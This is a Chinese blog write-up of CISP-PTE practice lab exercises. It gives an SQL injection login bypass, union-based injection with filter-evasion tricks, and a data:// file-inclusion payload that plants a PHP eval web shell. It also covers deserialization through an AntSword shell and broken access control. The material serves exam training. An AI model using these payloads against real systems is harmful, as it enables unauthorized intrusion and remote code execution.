【PTE练习】34051,34061,34073,34074,34075

最新推荐文章于 2024-04-29 19:37:36 发布
最新推荐文章于 2024-04-29 19:37:36 发布
阅读量259 收藏 1
点赞数
分类专栏: PTE 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leo788/article/details/130367541
版权

PTE34041-34045靶场练习

34051sql注入 万能密码

万能密码:构造闭合select * from where user=‘admin‘ or ’1’=‘1’ and password=‘ ’
在这里插入图片描述

34061 sql注入 闭合

在这里插入图片描述
在这里插入图片描述
闭合符号为:%')
在这里插入图片描述
使用union select语句,若是回显正常说明列的数量猜对了
这里对union和空格进行了过滤–》双写,空格改为%20、/**/
注释:–空 --+ %23 #
在这里插入图片描述
语句可以显示出来说明语句注入起效,不用管后边的闭合符号,但是返回列表还是空的,说明列数没猜对。
在这里插入图片描述
猜到七返回显示,把id后的内容改成-1看是哪个位置可以利用
在这里插入图片描述
步骤:
select group_concat(table_name) from information_schema.tables where table_schema='2web'
在这里插入图片描述
这道题只需要读取一下文件就行:
在这里插入图片描述

34073 文件包含

在这里插入图片描述
会在包含的文件后边加后缀.txt
使用data协议,payload:page=data:text/plain,<?php @eval($_POST['x']);?>%23
%23用来将后缀屏蔽

34074 反序列化

这里利用文件上传后的蚁剑来构造一个s.php,内容是用来构造序列化的内容:
在这里插入图片描述
调用一下,得到序列化的语句:
在这里插入图片描述
再用变量传参:
在这里插入图片描述

34075 失效的访问控制

在这里插入图片描述
%3D应该是url编码的等号,所以最后要有把等号转换的过程

lexi7a
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISP-PTE实操练习讲解
lza20001103的博客
07-05 3846
CISP-PTE实操练习讲解
CISP-PTE实操练习题讲解二(新版)
lza20001103的博客
08-06 7027
CISP-PTE实操练习题讲解二(新版)
CISP-PTE练习篇(基础题目五:失效的访问控制)
wojiaoqwe的博客
01-31 1141
本文仅当作练习记录使用。
反序列化练习
偷一个月亮
06-23 372
class Flag{ //flag.php public $files;
cisp-pte考试靶场及通关攻略下载
潇湘信安的博客
02-17 3271
周末抽空找了几个CISP-PTE考试靶场和一份通关攻略文档,并将这份攻略整理成了PDF文档。
2021-02-15
m0_53314778的博客
02-15 172
[NCTF2019]True XML cookbook 考查知识点: xxe注入攻击 xxe内网探测 基础知识点: XXE漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 XM
pte练习题(34071-34075
haoaaao的博客
02-08 1744
一、34071(sql注入) 1、get型,首先想办法闭合语句: (1)从代码中可以看出,--、#及其url转义均被屏蔽 ​​​​​​​ (2)前面加1',结尾加or '1, 来闭合语句: 2、语句成功闭合,使用sqlmap进行sql注入: (1)查询数据库: python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" --db...
CISP_PTE练习题docker环境
01-19
CISP_PTE练习题docker环境
CISP-PTE模拟练习网站源码.zip
11-22
这个模拟练习网站源码是为了帮助考生准备CISP-PTE考试而设计的。源码通常包含了网站的全部结构、功能实现以及逻辑流程,是理解网站工作原理的关键。 该压缩包文件"**CISP-PTE模拟练习网站源码.zip**"包含了一个完整...
pte练习题(34011-34015)
haoaaao的博客
02-03 2553
一、34011(sql注入) 1、首先测试一下该网站可能会有些什么漏洞: (1)用乱码注册用户可以成功,但无法发表文章;说明用户名会影响数据插入; (2)正常账号的发表正常内容成功,但发表特殊符号失败,说明数据插入的时候存在sql注入漏洞; (3)用户a的信息,用户b不能查看;结合第(1)条说明数据插入语句中包含用户名信息。 2、 数据库插入函数:insert value(' ', ' ', ' ') 该函数至少有三个参数,将语句闭合即可,但无法确定输入内容是第几个参数,.
pte练习题(34031-34035)
haoaaao的博客
02-04 1542
一、34031(二次sql注入) 和34021一毛一样 1、注册特殊字符用户,比如'"*--#,注册成功,说明注册登录页面没有sql注入漏洞;进入后重置密码,不成功,说明有sql注入漏洞,重置密码没有重新输入用户名的操作,说明重置密码的updata语句中,引入了注册的username,导致语句被注释; 2、注册admin'#+随便一个字符,比如admin'#1,设置密码,进入后重置密码,成功,说明单引号可以将updata语句闭合,#后面字符均无用,也就是成功将admin用户的密码重置; 3、使用ad
CISP-PTE考前练习题4
2301_79546223的博客
09-16 430
CISP-PTE考前练习
PTE练习】34041-34045
leo788的博客
04-25 116
cisp-pte考试练习靶场:34041-34045习题及过程总结
CISP-PTE靶场基础真题实训一
weixin_46249630的博客
12-01 1679
CISP-PTE靶场基础真题实训思路详解
CISP-PTE学习总结之基础练习题(三)
千寻的博客
10-20 5805
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解题总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解题过程: 0x03 解题总结: 练习题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解题过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解题过程: 0x03 解题总结:
CISP-PTE靶机真题实训之SQL注入(无法重置密码的情况二)
weixin_46249630的博客
12-09 672
CISP-PTE靶机真题实训之SQL注入(无法重置密码的情况二)思路详解
CISP-PTE学习总结之基础练习题(二)
千寻的博客
10-20 7842
基础题目一:SQL注入 0x01 题目要求 0x02 解题过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解题过程 基础题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目四:代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解题过程
关于考CISP-PTE的那一小点心得
最新发布
在Web和Reverse坑里游泳中。。。。
04-29 654
说实话,当我把题全做出来之后,我并没有太强的喜悦感,也许是我紧张过头了,毕竟考试前焦虑的失眠。直到看漫画中说:武术不是为了求胜,而是为了超越自我。参加天下第一武道会不是以胜利为目的,主要是为检测自己的实力和积累经验。从考证的角度说,虽然网上有说考PTE没啥含金量的,但是对于我这样从不会到会的来说还是有一定难度的。不过确实没感觉自己的水平有特别高的提高,所以为了提升自己的技术水平,还是要努力的学习才对,目前的想法是考虑考虑OSCP。
CISP-PTE八套真题详解(侵删)
00勇士王子的博客
12-02 6536
PTE八套模拟题详解,侵删
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值